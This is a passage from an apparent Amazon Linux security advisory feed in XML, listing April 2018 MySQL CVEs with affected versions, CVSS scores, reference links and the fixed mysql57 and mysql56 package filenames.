Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Optimizer). Supported versions that are affected are 5.5.59 and prior, 5.6.39 and prior and 5.7.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1568942:
CVE-2018-2781 mysql: Server: Optimizer unspecified vulnerability (CPU Apr 2018)
CVE-2018-2780:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Optimizer). Supported versions that are affected are 5.7.21 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1568941:
CVE-2018-2780 mysql: Server: Optimizer unspecified vulnerability (CPU Apr 2018)
CVE-2018-2779:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Optimizer). Supported versions that are affected are 5.7.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1568940:
CVE-2018-2779 mysql: Server: Optimizer unspecified vulnerability (CPU Apr 2018)
CVE-2018-2778:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Optimizer). Supported versions that are affected are 5.7.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1568938:
CVE-2018-2778 mysql: Server: Optimizer unspecified vulnerability (CPU Apr 2018)
CVE-2018-2777:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: InnoDB). Supported versions that are affected are 5.7.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1568937:
CVE-2018-2777 mysql: InnoDB unspecified vulnerability (CPU Apr 2018)
CVE-2018-2776:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Group Replication GCS). Supported versions that are affected are 5.7.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via XCom to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1568936:
CVE-2018-2776 mysql: Group Replication GCS unspecified vulnerability (CPU Apr 2018)
CVE-2018-2775:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Optimizer). Supported versions that are affected are 5.7.21 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1568934:
CVE-2018-2775 mysql: Server: Optimizer unspecified vulnerability (CPU Apr 2018)
CVE-2018-2773:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Client programs). Supported versions that are affected are 5.5.59 and prior, 5.6.39 and prior and 5.7.21 and prior. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where MySQL Server executes to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.1 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H).
1568932:
CVE-2018-2773 mysql: Client programs unspecified vulnerability (CPU Apr 2018)
CVE-2018-2771:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Locking). Supported versions that are affected are 5.5.59 and prior, 5.6.39 and prior and 5.7.21 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.4 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H).
1568931:
CVE-2018-2771 mysql: Server: Locking unspecified vulnerability (CPU Apr 2018)
CVE-2018-2769:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Pluggable Auth). Supported versions that are affected are 5.7.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1568927:
CVE-2018-2769 mysql: Server: Pluggable Auth unspecified vulnerability (CPU Apr 2018)
CVE-2018-2766:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: InnoDB). Supported versions that are affected are 5.6.39 and prior and 5.7.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1568926:
CVE-2018-2766 mysql: InnoDB unspecified vulnerability (CPU Apr 2018)
CVE-2018-2762:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Connection). Supported versions that are affected are 5.7.21 and prior. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where MySQL Server executes to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.4 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1568925:
CVE-2018-2762 mysql: Server: Connection unspecified vulnerability (CPU Apr 2018)
CVE-2018-2761:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Client programs). Supported versions that are affected are 5.5.59 and prior, 5.6.39 and prior and 5.7.21 and prior. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 5.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H).
1568924:
CVE-2018-2761 mysql: Client programs unspecified vulnerability (CPU Apr 2018)
CVE-2018-2759:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: InnoDB). Supported versions that are affected are 5.7.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1568923:
CVE-2018-2759 mysql: InnoDB unspecified vulnerability (CPU Apr 2018)
CVE-2018-2758:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server : Security : Privileges). Supported versions that are affected are 5.6.39 and prior and 5.7.21 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1568922:
CVE-2018-2758 mysql: Server: Security: Privileges unspecified vulnerability (CPU Apr 2018)
CVE-2018-2755:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Replication). Supported versions that are affected are 5.5.59 and prior, 5.6.39 and prior and 5.7.21 and prior. Difficult to exploit vulnerability allows unauthenticated attacker with logon to the infrastructure where MySQL Server executes to compromise MySQL Server. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in MySQL Server, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of MySQL Server. CVSS 3.0 Base Score 7.7 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H).
1568921:
CVE-2018-2755 mysql: Server: Replication unspecified vulnerability (CPU Apr 2018)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2755" title="" id="CVE-2018-2755" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2758" title="" id="CVE-2018-2758" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2759" title="" id="CVE-2018-2759" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2761" title="" id="CVE-2018-2761" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2762" title="" id="CVE-2018-2762" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2766" title="" id="CVE-2018-2766" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2769" title="" id="CVE-2018-2769" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2771" title="" id="CVE-2018-2771" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2773" title="" id="CVE-2018-2773" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2775" title="" id="CVE-2018-2775" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2776" title="" id="CVE-2018-2776" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2777" title="" id="CVE-2018-2777" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2778" title="" id="CVE-2018-2778" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2779" title="" id="CVE-2018-2779" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2780" title="" id="CVE-2018-2780" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2781" title="" id="CVE-2018-2781" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2782" title="" id="CVE-2018-2782" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2784" title="" id="CVE-2018-2784" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2786" title="" id="CVE-2018-2786" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2787" title="" id="CVE-2018-2787" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2810" title="" id="CVE-2018-2810" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2812" title="" id="CVE-2018-2812" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2813" title="" id="CVE-2018-2813" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2816" title="" id="CVE-2018-2816" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2817" title="" id="CVE-2018-2817" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2818" title="" id="CVE-2018-2818" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2819" title="" id="CVE-2018-2819" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2839" title="" id="CVE-2018-2839" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2846" title="" id="CVE-2018-2846" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql57-server" version="5.7.22" release="2.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-server-5.7.22-2.7.amzn1.x86_64.rpm</filename></package><package name="mysql57-common" version="5.7.22" release="2.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-common-5.7.22-2.7.amzn1.x86_64.rpm</filename></package><package name="mysql57" version="5.7.22" release="2.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-5.7.22-2.7.amzn1.x86_64.rpm</filename></package><package name="mysql57-devel" version="5.7.22" release="2.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-devel-5.7.22-2.7.amzn1.x86_64.rpm</filename></package><package name="mysql57-test" version="5.7.22" release="2.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-test-5.7.22-2.7.amzn1.x86_64.rpm</filename></package><package name="mysql57-errmsg" version="5.7.22" release="2.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-errmsg-5.7.22-2.7.amzn1.x86_64.rpm</filename></package><package name="mysql57-embedded" version="5.7.22" release="2.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-embedded-5.7.22-2.7.amzn1.x86_64.rpm</filename></package><package name="mysql57-debuginfo" version="5.7.22" release="2.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-debuginfo-5.7.22-2.7.amzn1.x86_64.rpm</filename></package><package name="mysql57-libs" version="5.7.22" release="2.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-libs-5.7.22-2.7.amzn1.x86_64.rpm</filename></package><package name="mysql57-embedded-devel" version="5.7.22" release="2.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-embedded-devel-5.7.22-2.7.amzn1.x86_64.rpm</filename></package><package name="mysql57-server" version="5.7.22" release="2.7.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-server-5.7.22-2.7.amzn1.i686.rpm</filename></package><package name="mysql57-common" version="5.7.22" release="2.7.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-common-5.7.22-2.7.amzn1.i686.rpm</filename></package><package name="mysql57-libs" version="5.7.22" release="2.7.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-libs-5.7.22-2.7.amzn1.i686.rpm</filename></package><package name="mysql57-test" version="5.7.22" release="2.7.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-test-5.7.22-2.7.amzn1.i686.rpm</filename></package><package name="mysql57" version="5.7.22" release="2.7.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-5.7.22-2.7.amzn1.i686.rpm</filename></package><package name="mysql57-devel" version="5.7.22" release="2.7.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-devel-5.7.22-2.7.amzn1.i686.rpm</filename></package><package name="mysql57-debuginfo" version="5.7.22" release="2.7.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-debuginfo-5.7.22-2.7.amzn1.i686.rpm</filename></package><package name="mysql57-errmsg" version="5.7.22" release="2.7.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-errmsg-5.7.22-2.7.amzn1.i686.rpm</filename></package><package name="mysql57-embedded-devel" version="5.7.22" release="2.7.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-embedded-devel-5.7.22-2.7.amzn1.i686.rpm</filename></package><package name="mysql57-embedded" version="5.7.22" release="2.7.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-embedded-5.7.22-2.7.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1027</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1027: medium priority package update for mysql56</title><issued date="2018-05-25 18:26:00" /><updated date="2018-05-29 23:13:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-2819:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: InnoDB). Supported versions that are affected are 5.5.59 and prior, 5.6.39 and prior and 5.7.21 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1568956:
CVE-2018-2819 mysql: InnoDB unspecified vulnerability (CPU Apr 2018)
CVE-2018-2818:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server : Security : Privileges). Supported versions that are affected are 5.5.59 and prior, 5.6.39 and prior and 5.7.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1568955:
CVE-2018-2818 mysql: Server : Security : Privileges unspecified vulnerability (CPU Apr 2018)
CVE-2018-2817:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: DDL). Supported versions that are affected are 5.5.59 and prior, 5.6.39 and prior and 5.7.21 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1568954:
CVE-2018-2817 mysql: Server: DDL unspecified vulnerability (CPU Apr 2018)
CVE-2018-2813:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: DDL). Supported versions that are affected are 5.5.59 and prior, 5.6.39 and prior and 5.7.21 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized read access to a subset of MySQL Server accessible data. CVSS 3.0 Base Score 4.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N).
1568951:
CVE-2018-2813 mysql: Server: DDL unspecified vulnerability (CPU Apr 2018)
CVE-2018-2787:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: InnoDB). Supported versions that are affected are 5.6.39 and prior and 5.7.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server as well as unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.0 Base Score 5.5 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:H).
1568946:
CVE-2018-2787 mysql: InnoDB unspecified vulnerability (CPU Apr 2018)
CVE-2018-2784:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: InnoDB). Supported versions that are affected are 5.6.39 and prior and 5.7.21 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1568944:
CVE-2018-2784 mysql: InnoDB unspecified vulnerability (CPU Apr 2018)
CVE-2018-2782:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: InnoDB). Supported versions that are affected are 5.6.39 and prior and 5.7.21 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1568943:
CVE-2018-2782 mysql: InnoDB unspecified vulnerability (CPU Apr 2018)
CVE-2018-2781:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Optimizer). Supported versions that are affected are 5.5.59 and prior, 5.6.39 and prior and 5.7.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1568942:
CVE-2018-2781 mysql: Server: Optimizer unspecified vulnerability (CPU Apr 2018)
CVE-2018-2773:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Client programs). Supported versions that are affected are 5.5.59 and prior, 5.6.39 and prior and 5.7.21 and prior. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where MySQL Server executes to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.1 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H).
1568932:
CVE-2018-2773 mysql: Client programs unspecified vulnerability (CPU Apr 2018)
CVE-2018-2771:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Locking). Supported versions that are affected are 5.5.59 and prior, 5.6.39 and prior and 5.7.21 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.4 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H).
1568931:
CVE-2018-2771 mysql: Server: Locking unspecified vulnerability (CPU Apr 2018)
CVE-2018-2766:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: InnoDB). Supported versions that are affected are 5.6.39 and prior and 5.7.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1568926:
CVE-2018-2766 mysql: InnoDB unspecified vulnerability (CPU Apr 2018)
CVE-2018-2761:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Client programs). Supported versions that are affected are 5.5.59 and prior, 5.6.39 and prior and 5.7.21 and prior. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 5.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H).
1568924:
CVE-2018-2761 mysql: Client programs unspecified vulnerability (CPU Apr 2018)
CVE-2018-2758:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server : Security : Privileges). Supported versions that are affected are 5.6.39 and prior and 5.7.21 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1568922:
CVE-2018-2758 mysql: Server: Security: Privileges unspecified vulnerability (CPU Apr 2018)
CVE-2018-2755:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Replication). Supported versions that are affected are 5.5.59 and prior, 5.6.39 and prior and 5.7.21 and prior. Difficult to exploit vulnerability allows unauthenticated attacker with logon to the infrastructure where MySQL Server executes to compromise MySQL Server. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in MySQL Server, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of MySQL Server. CVSS 3.0 Base Score 7.7 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H).
1568921:
CVE-2018-2755 mysql: Server: Replication unspecified vulnerability (CPU Apr 2018)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2755" title="" id="CVE-2018-2755" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2758" title="" id="CVE-2018-2758" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2761" title="" id="CVE-2018-2761" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2766" title="" id="CVE-2018-2766" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2771" title="" id="CVE-2018-2771" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2773" title="" id="CVE-2018-2773" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2781" title="" id="CVE-2018-2781" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2782" title="" id="CVE-2018-2782" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2784" title="" id="CVE-2018-2784" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2787" title="" id="CVE-2018-2787" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2813" title="" id="CVE-2018-2813" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2817" title="" id="CVE-2018-2817" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2818" title="" id="CVE-2018-2818" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2819" title="" id="CVE-2018-2819" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql56" version="5.6.40" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-5.6.40-1.29.amzn1.x86_64.rpm</filename></package><package name="mysql56-libs" version="5.6.40" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-libs-5.6.40-1.29.amzn1.x86_64.rpm</filename></package><package name="mysql56-test" version="5.6.40" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-test-5.6.40-1.29.amzn1.x86_64.rpm</filename></package><package name="mysql56-embedded-devel" version="5.6.40" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-embedded-devel-5.6.40-1.29.amzn1.x86_64.rpm</filename></package><package name="mysql56-bench" version="5.6.40" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-bench-5.6.40-1.29.amzn1.x86_64.rpm</filename></package><package name="mysql56-common" version="5.6.40" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-common-5.6.40-1.29.amzn1.x86_64.rpm</filename></package><package name="mysql56-errmsg" version="5.6.40" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-errmsg-5.6.40-1.29.amzn1.x86_64.rpm</filename></package><package name="mysql56-server" version="5.6.40" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-server-5.6.40-1.29.amzn1.x86_64.rpm</filename></package><package name="mysql56-devel" version="5.6.40" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-devel-5.6.40-1.29.amzn1.x86_64.rpm</filename></package><package name="mysql56-embedded" version="5.6.40" release="1.29.amzn1" epoch="0" 